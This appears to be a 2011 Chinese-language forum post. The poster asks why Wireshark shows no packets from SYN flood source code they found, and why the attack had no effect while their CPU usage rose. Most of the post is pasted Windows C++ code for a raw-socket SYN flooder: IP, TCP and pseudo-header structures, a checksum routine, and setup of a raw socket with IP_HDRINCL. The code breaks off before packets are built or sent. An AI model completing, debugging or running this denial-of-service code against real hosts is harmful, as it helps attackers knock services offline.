看了个SYN Flood的源代码,为啥抓包抓不到呢

看了个SYN Flood的源代码,为什么抓包抓不到呢?
本帖最后由 VisualEleven 于 2011-08-01 08:37:27 编辑
我用的是wireshark抓,根本就抓不到包。而且攻击也没有效果,反而是自己的CPU到高了
#include <stdlib.h>    
#include <stdio.h>    

#include <winsock2.h>       //加入WinSock的头文件    
#include <WS2TCPIP.h>       //设置IP_HDRINCL选中需要    
#include <time.h>    

#include <iostream>    
using namespace std;   
#pragma comment(lib,"Ws2_32.lib")    //加入库函数    


typedef struct //定义IP首部     
{    
unsigned char h_verlen; //4位首部长度,4位IP版本号     
unsigned char tos; //8位服务类型TOS     
unsigned short total_len; //16位总长度(字节)     
unsigned short ident; //16位标识     
unsigned short frag_and_flags; //3位标志位     
unsigned char ttl; //8位生存时间 TTL     
unsigned char proto; //8位协议 (TCP, UDP 或其他)     
unsigned short checksum; //16位IP首部校验和     
unsigned int sourceIP; //32位源IP地址     
unsigned int destIP; //32位目的IP地址     
}IPHEADER;    


typedef struct  //定义TCP首部     
{    
USHORT th_sport; //16位源端口     
USHORT th_dport; //16位目的端口     
unsigned int th_seq; //32位序列号     
unsigned int th_ack; //32位确认号     
unsigned char th_lenres; //4位首部长度/6位保留字     
unsigned char th_flag; //6位标志位     
USHORT th_win; //16位窗口大小     
USHORT th_sum; //16位校验和     
USHORT th_urp; //16位紧急数据偏移量     
}TCPHEADER;    

typedef struct  //定义TCP伪首部     
{    
unsigned long saddr; //源地址     
unsigned long daddr; //目的地址     
char mbz;    
char ptcl; //协议类型     
unsigned short tcpl; //TCP长度     
}PSDHEADER;   

//计算校验和函数    
USHORT checksum(USHORT *buffer, int size)   
{   
unsigned long cksum=0;    
while(size >1)    
{    
cksum+=*buffer++;    
size -=sizeof(USHORT);    
}    
if(size )    
{    
cksum += *(UCHAR*)buffer;    
}    

cksum = (cksum >> 16) + (cksum & 0xffff);    
cksum += (cksum >>16);    
return (USHORT)(~cksum);    
}   

//void packet_input();    


int main()   
{   

WSADATA WSAData;   
if ( WSAStartup(MAKEWORD(1,1), &WSAData)!=0 )   
{   
printf("InitWSAStartup Error!\n");   
return 0;   
}   


//////////////////////////////////////////////////////////////////////////    
//随机源端口    

int rand_SourcePort;   
srand( (unsigned)time( NULL ) );   
rand_SourcePort = 4444;//(int)(3000+2000*rand()/(float)RAND_MAX); //产生3000到5000之间的随机数    

//////////////////////////////////////////////////////////////////////////    

char ip[20];   
u_short port;   

SOCKET sock;    
SOCKADDR_IN addr_in;   
IPHEADER ipHeader;    
TCPHEADER tcpHeader;    
PSDHEADER psdHeader;    

char szSendBuf[60]={0};    
int rect,nTimeOver;   

if ((sock = socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)   
{   
printf("sock err!");   
return 0;   
}   

//设置IP_HDRINCL选项,声明自己填充IP头部    
BOOL blnFlag=TRUE;    

if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&blnFlag, sizeof(blnFlag)))